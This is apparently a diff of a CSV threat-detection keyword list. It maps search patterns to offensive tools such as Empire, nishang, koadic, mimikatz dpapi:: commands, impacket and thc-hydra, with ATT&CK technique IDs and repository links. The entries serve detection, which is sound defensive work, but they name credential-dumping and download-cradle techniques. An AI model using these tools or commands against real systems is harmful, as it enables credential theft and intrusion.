 "*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
-"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*Download-Cradles.cmd*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
-"*Download-Execute-PS*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Download-Execute-PS*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
 "*DownloadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Downloading */*.tar to /tmp/*.pak*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*downloadMalwareDomains*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"*downloads/wapiti-code*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 
Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*downloads/wapiti-code*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*DownloadString*https://checkip.amazonaws.com*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" -"*dpapi.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*dpapi.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*dpapi/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*dpapi::blob*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::chrome*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cloudapkd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cloudapreg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::create*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::credhist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::luna*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::masterkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::protect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::ps*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::rdg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::ssh*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::tpm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::vault*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::wifi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::wwman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*dpapi_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 
- TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*dpapi_pick/credhist.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*DPAPImk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*dpl4hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra.sh*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" 